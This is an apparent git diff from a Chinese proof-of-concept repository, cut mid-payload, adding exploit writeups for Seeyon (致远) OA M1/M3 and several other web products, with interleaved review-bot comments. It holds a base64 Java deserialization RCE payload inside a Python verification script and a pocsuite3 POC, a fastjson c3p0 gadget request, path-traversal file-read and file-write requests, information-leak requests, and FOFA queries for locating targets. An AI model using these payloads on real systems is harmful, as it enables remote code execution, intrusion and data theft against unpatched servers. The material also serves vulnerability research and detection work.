W1WamREc3BXZ0VBQkhSeWFXMEJBQXB6ZEdGeWRITlhhWFJvQVFBVktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bGFBUUFIY21Wd2JHRmpaUUVBUkNoTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHRNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUc3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFGYzNCc2FYUUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1Z0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBZDJZV3gxWlU5bUFRQW5LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBsdWRHVm5aWEk3QVFBUWFtRjJZUzlzWVc1bkwxTjVjM1JsYlFFQUMyZGxkRkJ5YjNCbGNuUjVBUUFMZEc5T
WIzZGxja05oYzJVQkFBWmhjSEJsYm1RQkFDd29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5RblZtWm1WeU93RUFDSFJ2VTNSeWFXNW5BUUFSYW1GMllTOXNZVzVuTDFKMWJuUnBiV1VCQUFwblpYUlNkVzUwYVcxbEFRQVZLQ2xNYW1GMllTOXNZVzVuTDFKMWJuUnBiV1U3QVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUIyaGhjMDVsZUhRQkFBTW9LVm9CQUFSdVpYaDBBUUFPWjJWMFJYSnliM0pUZEhKbFlXMEJBQWRrWlhOMGNtOTVBUUFuS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQUlhVzUwVm1Gc2RXVUJBQllvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3U1NsV0FRQVBaMlYwVDNWMGNIVjBVM1J5WldGdEFRQVlLQ2xNYW1GMllTOXBieTlQZFhSd2RYUlRkSEpsWVcwN0FRQUlhWE5EYkc5elpXUUJBQk5xWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0QVFBSllYWmhhV3hoWW14bEFRQUVjbVZoWkFFQUZHcGhkbUV2YVc4dlQzVjBjSFYwVTNSeVpXRnRBUUFGZDNKcGRHVUJBQVZtYkhWemFBRUFCWE5zWldWd0FRQUVLRW9wVmdFQUNXVjRhWFJXWVd4MVpRRUFCV05zYjNObEFDRUFmZ0FpQUFBQUFnQUlBSDhBZ0FBQkFJRUFBQUFBQUFnQWdnQ0FBQUVBZ1FBQUFBQUFCZ0FCQUlNQWhBQUNBSVVBQUFRUkFBZ0FFUUFBQXRFcXR3QUd1QUFIdGdBSVRDdTJBQWtTQ3JZQUMwMHNCTFlBREN3cnRnQU53QUFPd0FBT1RnTTJCQlVFTGI2aUFxTXRGUVF5T2dVWkJjY0FCcWNDanhrRnRnQVBPZ1laQmhJUXRnQVJtZ0FOR1FZU0VyWUFFWm9BQnFjQ2NSa0Z0Z0FKRWhPMkFBdE5MQVMyQUF3c0dRVzJBQTA2QnhrSHdRQVVtZ0FHcHdKT0dRZTJBQWtTRmJZQUMwMHNCTFlBREN3WkI3WUFEVG9IR1FlMkFBa1NGcllBQzAybkFCWTZDQmtIdGdBSnRnQVl0Z0FZRWhhMkFBdE5MQVMyQUF3c0dRZTJBQTA2QnhrSHRnQUp0Z0FZRWhtMkFBdE5wd0FRT2dnWkI3WUFDUkladGdBTFRTd0V0Z0FNTEJrSHRnQU5PZ2NaQjdZQUNSSWF0Z0FMVFN3RXRnQU1MQmtIdGdBTndBQWJ3QUFiT2dnRE5na1ZDUmtJdVFBY0FRQ2lBYWdaQ0JVSnVRQWRBZ0E2Q2hrS3RnQUpFaDYyQUF0TkxBUzJBQXdzR1FxMkFBMDZDeGtMdGdBSkVoOER2UUFndGdBaEdRc0R2UUFpdGdBak9nd1pDN1lBQ1JJa0JMMEFJRmtEc2dBbHh3QVBFaWE0QUNkWnN3QWxwd0FHc2dBbFU3WUFJUmtMQkwwQUlsa0RFaWhUdGdBandBQXBPZzBaRGNjQUJxY0JKU29aRGJZQUtyWUFLem9PR1F5MkFBa1NMQVM5QUNCWkE3SUFMVk8yQUNFW
kRBUzlBQ0paQTdzQUxsa1JBTWkzQUM5VHRnQWpWeW9TTUxZQU1Ub1BHUSsyQURJNkJ4a1BFak1HdlFBZ1dRT3lBRFRIQUE4U05iZ0FKMW16QURTbkFBYXlBRFJUV1FTeUFDMVRXUVd5QUMxVHRnQTJHUWNHdlFBaVdRTVpEbE5aQkxzQUxsa0R0d0F2VTFrRnV3QXVXUmtPdnJjQUwxTzJBQ05YR1F5MkFBa1NOd1M5QUNCWkF4a1BVN1lBSVJrTUJMMEFJbGtER1FkVHRnQWpWNmNBWWpvUEtoSTV0Z0F4T2hBWkVCSTZCTDBBSUZrRHNnQTB4d0FQRWpXNEFDZFpzd0EwcHdBR3NnQTBVN1lBTmhrUUJMMEFJbGtER1E1VHRnQWpPZ2NaRExZQUNSSTNCTDBBSUZrREdSQlR0Z0FoR1F3RXZRQWlXUU1aQjFPMkFDTlhwd0FYaEFrQnAvNVNwd0FJT2dhbkFBT0VCQUduL1Z5eEFBZ0Fsd0NpQUtVQUZ3REZBTk1BMWdBWEFkQUNWd0phQURnQU5nQTdBc1VBT0FBK0FGa0N4UUE0QUZ3QWZBTEZBRGdBZndLNUFzVUFPQUs4QXNJQ3hRQTRBQUVBaGdBQUFPNEFPd0FBQUEwQUJBQU9BQXNBRHdBVkFCQUFHZ0FSQUNZQUV3QXdBQlFBTmdBV0FENEFGd0JGQUJnQVhBQVpBR2NBR2dCc0FCc0FkQUFjQUg4QUhRQ0tBQjRBandBZkFKY0FJUUNpQUNRQXBRQWlBS2NBSXdDNEFDVUF2UUFtQU1VQUtBRFRBQ3NBMWdBcEFOZ0FLZ0RqQUN3QTZBQXRBUEFBTGdEN0FDOEJBQUF3QVE0QU1RRWRBRElCS0FBekFUTUFOQUU0QURVQlFBQTJBVmtBTndHU0FEZ0Jsd0E1QVpvQU93R2xBRHdCMEFBK0FkZ0FQd0hmQUVBQ05RQkJBbGNBUmdKYUFFSUNYQUJEQW1RQVJBS1hBRVVDdVFCSEFyd0FNUUxDQUVzQ3hRQkpBc2NBU2dMS0FCTUMwQUJOQUljQUFBQUVBQUVBT0FBQkFJZ0FpUUFDQUlVQUFBQTVBQUlBQXdBQUFCRXJ1QUFCc0UyNEFBZTJBRHNydGdBOHNBQUJBQUFBQkFBRkFBSUFBUUNHQUFBQURnQURBQUFBVndBRkFGZ0FCZ0JaQUljQUFBQUVBQUVBQWdBQkFJb0Fpd0FCQUlVQUFBQ1BBQVFBQXdBQUFGY3J4Z0FNRWowcnRnQSttUUFHRWord0s3WUFRRXdyRWtHMkFFS1pBQ2dyRWtFU1BiWUFReEpFdGdCRlRTeStCWjhBQmhKR3NDb3NBeklzQkRLNEFFZTJBRWl3S2lzU1FSSTl0Z0JERWtrU1BiWUFRN1lBU3JBQUFBQUJBSVlBQUFBbUFBa0FBQUJqQUEwQVpBQVFBR1lBRlFCbkFCNEFhUUFzQUdvQU1nQnJBRFVBYlFCREFHOEFBUUNNQUlzQUFRQ0ZBQUFCeWdBRUFBa0FBQUVxRWt1NEFFeTJBRTFOSzdZQVFFd0JUZ0U2QkN3U1RyWUFFWmtBUUNzU1Q3WUFFWmtBSUNzU1VMWUFFWm9BRjdzQVVWbTNBRklydGdCVEVsUzJBRk8yQUZWTUJyMEFLVmtERWloVFdRUVNWbE5aQlN0VE9nU25BRDByRWsrMkFCR1pBQ0FyRWxDMkFCR2FBQmU3QUZGWnR3QlNLN1lBVXhKWHRnQlR0Z0JWVEFhOUFDbFpBeEpZVTFrRUVsbFRXUVVyVXpvRXVBQmFHUVMyQUZ0T3V3QmNXUzIyQUYyM0FGNFNYN1lBWURvRkdRVzJBR0daQUFzWkJiWUFZcWNBQlJJOU9nYTdBRnhaTGJZQVk3Y0FYaEpmdGdCZ09nVzdBRkZadHdCU0dRYTJBRk1aQmJZQVlaa0FDeGtGdGdCaXB3QUZFajIyQUZPMkFGVTZCaGtHT2djdHhnQUhMYllBWkJrS
HNEb0ZHUVcyQUdVNkJpM0dBQWN0dGdCa0dRYXdPZ2d0eGdBSExiWUFaQmtJdndBRUFKTUEvZ0VKQURnQWt3RCtBUjBBQUFFSkFSSUJIUUFBQVIwQkh3RWRBQUFBQVFDR0FBQUFiZ0FiQUFBQWN3QUpBSFFBRGdCMUFCQUFkZ0FUQUhjQUhBQjRBQzRBZVFCQ0FIc0FXUUI5QUdzQWZnQi9BSUFBa3dDREFKd0FoQUN1QUlVQXdnQ0dBTlFBaHdENkFJZ0EvZ0NNQVFJQWpRRUdBSWdCQ1FDSkFRc0FpZ0VTQUl3QkZnQ05BUm9BaWdFZEFJd0JJd0NOQUFFQWpRQ09BQUVBaFFBQUFZTUFCQUFNQUFBQTh4Skx1QUJNdGdCTkVrNjJBQkdhQUJDN0FDbFpFbWEzQUdkT3B3QU51d0FwV1JKb3R3Qm5UcmdBV2kyMkFHazZCTHNBYWxrckxMWUFhN2NBYkRvRkdRUzJBRjA2QmhrRXRnQmpPZ2NaQmJZQWJUb0lHUVMyQUc0NkNSa0Z0Z0J2T2dvWkJiWUFjSm9BWUJrR3RnQnhuZ0FRR1FvWkJyWUFjcllBYzZmLzdoa0h0Z0J4bmdBUUdRb1pCN1lBY3JZQWM2Zi83aGtJdGdCeG5nQVFHUWtaQ0xZQWNyWUFjNmYvN2hrS3RnQjBHUW0yQUhRVUFIVzRBSGNaQkxZQWVGZW5BQWc2QzZmL25oa0V0Z0JrR1FXMkFIbW5BQ0JPdXdCUldiY0FVaEo2dGdCVExiWUFlN1lBVXhKOHRnQlR0Z0JWc0JKOXNBQUNBTGdBdmdEQkFEZ0FBQURRQU5NQU9BQUJBSVlBQUFCdUFCc0FBQUNiQUJBQW5BQWRBSjRBSndDZ0FEQUFvUUErQUtJQVV3Q2pBR0VBcEFCcEFLVUFjUUNtQUg0QXFBQ0dBS2tBa3dDckFKc0FyQUNvQUs0QXJRQ3ZBTElBc0FDNEFMSUF2Z0N6QU1FQXRBRERBTFVBeGdDM0FNc0F1QURRQUxzQTB3QzVBTlFBdWdEd0FMd0FDQUNQQUlrQUFnQ0ZBQUFBTWdBREFBSUFBQUFTS3JnQUFiQk11d0FEV1N1MkFBUzNBQVcvQUFFQUFBQUVBQVVBQWdBQkFJWUFBQUFHQUFFQUFBQTNBSUVBQUFBQUFBRUFrQUFBQUFJQWtRPT0iOwpjbHogPSBkZWZpbmVDbGFzcyhiYXNlNjREZWNvZGVUb0J5dGUoY29kZSkpOwpjbHoubmV3SW5zdGFuY2UoKTt0AARldmFsdXEAfgAbAAAAAXEAfgAjc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=") + req = requests.post(burp0_url, headers=headers, data=raw_data, verify=False) + if req.status_code==200: + return req.text + return "" + +if __name__=="__main__": + target = sys.argv[1] + info = verify(target) + if info != "": + print("[+]漏洞存在, 执行命令 ver 的结果为:", info) + else: + print("[-]漏洞不存在") ``` diff --git a/致远M1-usertokenservice-反序列化RCE漏洞.md b/致远M1-usertokenservice-反序列化RCE漏洞.md new file mode 100644 index 0000000..dd39d9e --- /dev/null +++ b/致远M1-usertokenservice-反序列化RCE漏洞.md 
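Review bot: `verify()` reports a target as vulnerable on any HTTP 200 (`if req.status_code==200: return req.text`), so a patched host that answers 200 with an error or login page is a false positive; the removed pocsuite3 version at least required the echoed marker in the body (`"Test" in response.text`), and the new script should likewise check that the response contains the expected command output before printing `[+]漏洞存在`. Further points in the new script: `requests.post(...)` has no `timeout`, so one unresponsive host hangs the run; `time`, `json`, `re` and `urllib` are imported and never used; `sys.argv[1]` is read without a usage check, so running it with no argument raises IndexError. The hard-coded `raw_data` blob is undocumented; a comment saying what it is (a serialized `java.util.HashSet` built from `org.apache.commons.collections` classes ending in `javax.script.ScriptEngineManager`, as the class names visible in the base64 show) would let maintainers and detection engineers understand the file without decoding it. The heading change from 批量检测脚本 to 检测脚本 matches the now single-target script, and adding the closing `")}}` on the `base64_decode` line is a correct repair of the old poc.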
@@ -0,0 +1,147 @@ +## 致远M1 usertokenservice 反序列化RCE漏洞 + +## fofa +``` +"M1-Server 已启动" +``` + +## poc +``` +POST /esn_mobile_pns/service/userTokenService HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 +Content-Type: application/x-www-form-urlencoded +cmd: @@@@@echo test + +{{base64_decode("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 +``` + +## 批量检测脚本 +```python +#!/usr/bin/env python + +# coding: utf-8 + + + +from pocsuite3.api import ( + + POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE, + + REVERSE_PAYLOAD, POC_CATEGORY + +) + + + +class POC(POCBase): + + vulID = '1' + + version = '1' + + author = ['AuthorName'] + + vulDate = '2023-08-15' + + createDate = '2023-08-15' + + updateDate = '2023-08-15' + + references = [''] + + name = 'POC Name' + + appPowerLink = '' + + appName = 'Application Name' + + appVersion = '' + + vulType = VUL_TYPE.COMMAND_EXECUTION + + desc = ''' + + Description of the vulnerability. + + ''' + + samples = [''] + + install_requires = [''] + + pocDesc = ''' + + How to use the POC. 
+ + ''' + + category = POC_CATEGORY.EXPLOITS.REMOTE + + + + def _verify(self): + + result = {} + + path = '/esn_mobile_pns/service/userTokenService' + + headers = { + + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", + + 'Connection': 'close', + + 'Content-Type': 'application/x-www-form-urlencoded', + + 'Accept-Encoding': 'gzip, deflate', + + 'cmd': '@@@@@echo Test', + + } + + data = '''{{base64dec(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 + +hvZHQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lNZXRob2RxAH4ACnhyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAACnQAGVJGOkpNb2RlbFJlc3VsdHQAG0xqYXZhL2xhbmcvU3RyaW5nO3hwc3EAfgAKc3IAJm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnlUiqsSmzlVCAIAAUwAA21hcHQAQkxqYXZhL2xhbmcvT2JqZWN0O3hwc3IAFGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwc3EAfgAJeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJUcmFuc2Zvcm1lcrN5Y+2Zs1QDAAB4cHcEAAAAAHg= + +''' + + response = requests.post(self.url + path, headers=headers, data=data) + + if response.status_code == 200 and "Test" in response.text: + + result['VerifyInfo'] = {} + + result['VerifyInfo']['URL'] = self.url + path + + result['VerifyInfo']['Payload'] = headers['cmd'] + + return self.parse_output(result) + + + + def _attack(self): + + return self._verify() + + + + def _parse_output(self, output): + + parsed_output = Output(self) + + if output: + + parsed_output.success(output) + + else: + + parsed_output.fail("Exploit failed. Target is not vulnerable.") + + return parsed_output + + + +register_poc(POC) + +``` diff --git a/致远OA-M3-Server-反序列化漏洞.md b/致远OA-M3-Server-反序列化漏洞.md new file mode 100644 index 0000000..423fb4f --- /dev/null +++ b/致远OA-M3-Server-反序列化漏洞.md 
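Review bot: this new file is a copy of the pre-change version of `致远M1 usertokenservice 反序列化RCE漏洞.md` (its blob id `dd39d9e` is the `---` side of the previous diff), so the repository now carries the same vulnerability twice, under a spaced and a hyphenated filename, and this copy keeps the defects the other diff just removed: the `{{base64_decode("` line in the poc has no closing `")}}`, the 批量检测脚本 is double-spaced on every line, and `_verify` calls `self.parse_output(result)` while the class only defines `_parse_output`, so it fails with AttributeError unless the base class supplies `parse_output`. Its `data` string also contains the `{{base64dec(...` template syntax copied from the HTTP poc, which Python sends as literal text rather than decoding. Drop this file, or replace its body with a pointer to the maintained one.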
@@ -0,0 +1,45 @@ + +## 致远OA M3 Server 反序列化漏洞 +致远 M3 反序列化 远程命令执行漏洞(XVE-2023-24878) + +漏洞信息: +https://x.threatbook.com/v5/vul/6bf25402a41b4fc27497a5b42a8421d7ef38d57cb7d8143dedb9a6f438310a2d9e083c39c56fee2571651827b4d9ce8d + + + +## fofa +``` +"M3-Server 已启动" +``` + +根据群友说,这个漏洞是fastjson反序列化 + +利用 CB1 生成 hex 反序列化数据,替换 POC 中的 HEX + +## poc +``` +POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1 +Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: Hm_lvt_82116c626a8d504a5c0675073362ef6f=1666334057 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Content-Type: application/json +Content-Length: 3680 + +[{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:HEX;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}] +``` +然后再 Get 访问/mobile_portal/api/systemLog/pns/loadLog/app.log + +![ef21d114d1965815537db98570d2daf7](https://github.com/wy876/POC/assets/139549762/b3609c72-0516-4c69-a64f-62c86fffb30d) + +## 漏洞分析 +``` +https://mp.weixin.qq.com/s/czbhaf7jpNmgjAt-OFWmIA +``` 
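Review bot: the request block is broken in two places: `Host: User-Agent: Mozilla/5.0 ...` runs the Host and User-Agent headers onto one line, and `Content-Length: 3680` is a fixed value while the body still contains the `HEX` placeholder the reader is told to replace with CB1-generated data, so the length cannot be right after substitution; drop the header or say it must be recomputed. The fastjson attribution rests on '根据群友说' even though the body itself shows it: the unicode-escaped `@type` key names `com.mchange.v2.c3p0.WrapperConnectionPoolDataSource` with `userOverridesAsString` set to `HexAsciiSerializedMap:HEX;`, which is the c3p0 fastjson gadget, so state that from the payload and cite the linked 漏洞分析 article instead (the link is currently inside a code fence; make it a plain link). That `\uXXXX` escaping of `@type` is also worth a sentence for defenders, since a WAF rule that matches the literal string `@type` will not see it. Finally, the '然后再 Get 访问 .../app.log' step should say what the reader is expected to find in the log.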
diff --git a/致远OA-wpsAssistServlet任意文件读取漏洞.md b/致远OA-wpsAssistServlet任意文件读取漏洞.md new file mode 100644 index 0000000..4c3df05 --- /dev/null +++ b/致远OA-wpsAssistServlet任意文件读取漏洞.md @@ -0,0 +1,14 @@ +## 致远OA wpsAssistServlet任意文件读取漏洞 + +## POC +``` +POST /seeyon/wpsAssistServlet HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +Content-Length: 47 +Content-Type: application/x-www-form-urlencoded + +flag=template&templateUrl=C:/windows/system.ini +``` diff --git a/致远OA后台表单导入任意文件写入漏洞.md b/致远OA后台表单导入任意文件写入漏洞.md new file mode 100644 index 0000000..1adab6f --- /dev/null +++ b/致远OA后台表单导入任意文件写入漏洞.md @@ -0,0 +1,35 @@ +# 致远OA后台表单导入任意文件写入漏洞 + +致远OA后台表单导入任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +app="致远互联-OA" +``` + +## poc + +```javascript +POST /seeyon/ajax.do?method=ajaxAction&managerName=cap4FormDesignManager HTTP/1.1 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Connection: keep-alive +Content-Length: 331 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Cookie: ts=1728653264995; JSESSIONID=EADD9E1D7E239870F85E73935AC9AD34; loginPageURL=; login_locale=zh_CN; avatarImageUrl=5995465946958220283 +Host: 192.168.18.129:8085 +RequestType: AJAX +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 + +managerMethod=generateInfopath&arguments={"files":[{"fileName":"../../../../../../ApacheJetspeed/webapps/seeyon/11.txt","fileContent":"1111"}]} +``` + +![8fe957553635d968043dff547bca65ce](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410131410574.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/kRCNBIbWvgdJ1BLWl31SYQ diff --git a/艾科思(霆智科技)应用接入系统存在任意文件读取漏洞.md b/艾科思(霆智科技)应用接入系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..086b691 --- /dev/null +++ b/艾科思(霆智科技)应用接入系统存在任意文件读取漏洞.md 
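Review bot: the wpsAssistServlet entry is only a raw request with no description, affected version, fix or source; at minimum state what the request demonstrates (`flag=template&templateUrl=<path>` makes `/seeyon/wpsAssistServlet` return a local file, `C:/windows/system.ini` in the example) and which 致远OA builds are affected. `Host: 127.0.0.1` should be the empty placeholder the other entries use.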
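Review bot: in the 后台表单导入 entry the request carries what looks like a real captured session (`Cookie: ts=1728653264995; JSESSIONID=EADD9E1D7E239870F85E73935AC9AD34; ...`) and a lab host `Host: 192.168.18.129:8085`; scrub both to placeholders and state the precondition explicitly, because the title says 后台 (post-auth) but the text never says an authenticated session is required. `Content-Length: 331` is larger than the body as printed (143 bytes), so it only matches a URL-encoded form of the body; say so or drop it. Both fences are tagged `javascript` for a fofa query and an HTTP request. The description should also name the mechanism shown: `fileName` inside the `generateInfopath` arguments accepts `../` segments and is joined under the webapp directory (`../../../../../../ApacheJetspeed/webapps/seeyon/11.txt`), which is what a fix (path normalisation and an allow-listed base directory) has to address.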
@@ -0,0 +1,30 @@ +# 艾科思(霆智科技)应用接入系统存在任意文件读取漏洞 + +# 一、漏洞简介 +艾科思应用接入系统(霆智科技的VA虚拟应用平台)是一个创新的技术平台,旨在为用户提供虚拟助手(Virtual Assistant)的功能和服务。虚拟助手是一种人工智能系统,通过自然语言处理、机器学习和其他相关技术,能够与用户进行对话,并执行各种任务和服务。该系统存在任意文件读取漏洞 + +# 二、影响版本 ++ 艾科思应用接入系统(霆智科技的VA虚拟应用平台 + +# 三、资产测绘 ++ fofa`body="EAA益和应用接入系统"` ++ 特征 + +![1696134097313-5de6d021-a63d-484a-a589-463d433d0311.png](./img/3KpyFjAQUmuFS8mN/1696134097313-5de6d021-a63d-484a-a589-463d433d0311-434273.png) + +# 四、漏洞复现 +```plain +GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate Connection: keep-alive +``` + +![1696134155798-c4e50cfe-ddcf-4a0a-94c0-1490816c96a8.png](./img/3KpyFjAQUmuFS8mN/1696134155798-c4e50cfe-ddcf-4a0a-94c0-1490816c96a8-405843.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: \ No newline at end of file diff --git a/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md b/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md new file mode 100644 index 0000000..41e2dca --- /dev/null +++ b/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md 
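Review bot: the header block runs two headers onto one line, `Accept-Encoding: gzip, deflate Connection: keep-alive`; split them. 影响版本 has an unclosed parenthesis (`霆智科技的VA虚拟应用平台`), and 漏洞简介 describes the product as a 'Virtual Assistant' while the same paragraph calls it a 'VA虚拟应用平台' and the fofa fingerprint names it 'EAA益和应用接入系统'; use one product name consistently. The description should state the mechanism the request shows: the traversal uses `..%5c` (URL-encoded backslash) segments, which a server-side fix or WAF rule must decode and normalise before matching, and the example reads `/windows/win.ini`. No fix or vendor reference is given and the trailing `> 原文:` is empty.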
@@ -0,0 +1,35 @@ +# 苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞 + +# 一、漏洞简介 +苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞 + +# 二、影响版本 +多媒体录播系统 + +# 三、资产测绘 ++ fofa`body="kedaname" || body="KEDACOM" || body="www.kedacom.com" || body="科达多媒体录播系统"` ++ 特征 + +![1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65.png](./img/VGSRQytOV8lBTDzI/1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65-330998.png) + +# 四、漏洞复现 +```plain +POST /fcgi-bin/vrswebinterpreter.fcgi HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 333 + +{"msgid":3061,"usermoid":"11111111-11111111-11111111-11111111","userdomainmoid":"11111111-11111111-11111111-11111111","rightmask":268435455,"content":{"userdomainmoid":"","StartPos":0,"EndPos":14,"IncludeName":""}} +``` + +![1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1.png](./img/VGSRQytOV8lBTDzI/1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1-754019.png) + + + +> 更新: 2024-11-27 10:00:05 +> 原文: \ No newline at end of file diff --git a/英飞达医学WebUserLogin.asmx信息泄露.md b/英飞达医学WebUserLogin.asmx信息泄露.md new file mode 100644 index 0000000..06949a4 --- /dev/null +++ b/英飞达医学WebUserLogin.asmx信息泄露.md @@ -0,0 +1,21 @@ +# 英飞达医学WebUserLogin.asmx信息泄露 + +## fofa + +```javascript +icon_hash="1474455751" || icon_hash="702238928" +``` + +## poc + +```javascript +GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![image-20241018160036699](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181600771.png) \ No newline at end of file 
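Review bot: in the 苏州科达 entry `Content-Length: 333` does not match the body shown (the JSON is 214 bytes), and the body is JSON while `Content-Type` says `application/x-www-form-urlencoded`; replay tools will wait for the missing bytes or reject the request, so fix the length or drop the header. 漏洞简介 only repeats the title: say what `msgid` 3061 on `/fcgi-bin/vrswebinterpreter.fcgi` returns, and whether the placeholder `usermoid`/`userdomainmoid` values (`11111111-...`) and `rightmask` are actually unchecked by the server, since that is the finding the screenshot is meant to show. 影响版本 is just '多媒体录播系统' with no version.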
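Review bot: the 英飞达 WebUserLogin.asmx entry has no description at all; it should say what `GetUserInfoByUserID` returns for `userID=admin` without authentication (the screenshot is the only evidence and is not searchable), the affected product version, and a source. Both fences are tagged `javascript`, the second for an HTTP request. The same product's WebJobUpload entry in this commit uses the repo's numbered 一/二/三/四 layout while this one does not; pick one layout.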
